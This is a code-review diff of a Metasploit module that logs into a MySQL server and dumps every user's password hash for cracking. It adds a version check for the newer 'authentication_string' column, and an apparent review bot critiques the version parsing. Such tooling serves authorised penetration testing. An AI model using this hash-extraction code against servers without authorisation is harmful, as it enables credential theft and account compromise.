diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
index 65fb904c6d..f1adde3fe7 100644
--- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
@@ -12,10 +12,10 @@ class MetasploitModule < Msf::Auxiliary
 def initialize
 super(
 'Name' => 'MYSQL Password Hashdump',
- 'Description' => %Q{
+ 'Description' => %(
 This module extracts the usernames and encrypted password
 hashes from a MySQL server and stores them for later cracking.
- },
+ ),
 'Author' => ['theLightCosine'],
 'License' => MSF_LICENSE
 )
@@ -23,48 +23,10 @@ class MetasploitModule < Msf::Auxiliary
 def run_host(ip)
- if (not mysql_login_datastore)
- return
- end
+ return unless mysql_login_datastore
 service_data = {
- address: ip,
- port: rport,
- service_name: 'mysql',
- protocol: 'tcp',
- workspace_id: myworkspace_id
- }
-
- credential_data = {
- module_fullname: self.fullname,
- origin_type: :service,
- private_data: datastore['PASSWORD'],
- private_type: :password,
- username: datastore['USERNAME']
- }
-
- credential_data.merge!(service_data)
-
- credential_core = create_credential(credential_data)
-
- login_data = {
- core: credential_core,
- last_attempted_at: DateTime.now,
- status: Metasploit::Model::Login::Status::SUCCESSFUL
- }
- login_data.merge!(service_data)
-
- create_credential_login(login_data)
-
- #Grabs the username and password hashes and stores them as loot
- res = mysql_query("SELECT user,password from mysql.user")
- if res.nil?
- print_error("There was an error reading the MySQL User Table")
- return
- end
-
- service_data = {
- address: ::Rex::Socket.getaddress(rhost,true),
+ address: ip,
 port: rport,
 service_name: 'mysql',
 protocol: 'tcp',
@@ -72,10 +34,54 @@ class MetasploitModule < Msf::Auxiliary
 }
 credential_data = {
- origin_type: :service,
- jtr_format: 'mysql,mysql-sha1',
- module_fullname: self.fullname,
- private_type: :nonreplayable_hash
+ module_fullname: self.fullname,
+ origin_type: :service,
+ private_data: datastore['PASSWORD'],
+ private_type: :password,
+ username: datastore['USERNAME']
+ }
+
+ credential_data.merge!(service_data)
+
+ credential_core = create_credential(credential_data)
+
+ login_data = {
+ core: credential_core,
+ last_attempted_at: DateTime.now,
+ status: Metasploit::Model::Login::Status::SUCCESSFUL
+ }
+ login_data.merge!(service_data)
+
+ create_credential_login(login_data)
+
+ # Grab the username and password hashes and store them as loot
+ version = mysql_get_variable("@@version")
+
+ # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'.
+ if version[0..2].to_f > 5.6
+ res = mysql_query("SELECT user,authentication_string from mysql.user")
+ else
+ res = mysql_query("SELECT user,password from mysql.user")
+ end
+
+ if res.nil?
+ print_error("There was an error reading the MySQL User Table")
+ return
+ end
+
+ service_data = {
+ address: ::Rex::Socket.getaddress(rhost, true),
+ port: rport,
+ service_name: 'mysql',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ origin_type: :service,
+ jtr_format: 'mysql,mysql-sha1',
+ module_fullname: self.fullname,
+ private_type: :nonreplayable_hash
 }
 credential_data.merge!(service_data)
@@ -87,17 +93,12 @@ class MetasploitModule < Msf::Auxiliary
 print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
 credential_core = create_credential(credential_data)
 login_data = {
- core: credential_core,
- status: Metasploit::Model::Login::Status::UNTRIED
+ core: credential_core,
+ status: Metasploit::Model::Login::Status::UNTRIED
 }
 login_data.merge!(service_data)
 create_credential_login(login_data)
 end
 end
- end
-
-
-
 end
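Review bot: The new column selection `if version[0..2].to_f > 5.6` is fragile: `mysql_get_variable("@@version")` returning nil raises NoMethodError on `nil[0..2]` instead of the module's usual `print_error`/return path, and a fixed three-character slice turns a "10.3.x-MariaDB" banner into `10.` → 10.0, which picks `authentication_string` on a server that, as far as I know, still keeps the hash in `password` — worth confirming against a MariaDB target before relying on it. Parsing the numeric parts keeps the intent without the float trick: `return print_error("Could not determine MySQL version") unless version`, then `major, minor = version.split('.').first(2).map(&:to_i)` and `if ([major, minor] <=> [5, 7]) >= 0`. As a secondary point, the second `service_data` literal repeats the first one except that it re-resolves `rhost` via `::Rex::Socket.getaddress`, although `ip` is already the resolved address used a few lines earlier; reusing that hash would remove the duplicate. `run_host` starts in the previous hunk and continues into the next.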